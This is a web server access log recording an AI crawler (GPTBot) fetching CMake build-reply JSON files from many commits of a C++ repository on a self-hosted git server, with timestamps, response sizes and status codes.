"/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13532] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13534] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12618] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13708] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13916] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12463] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12461] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13890] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13607] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 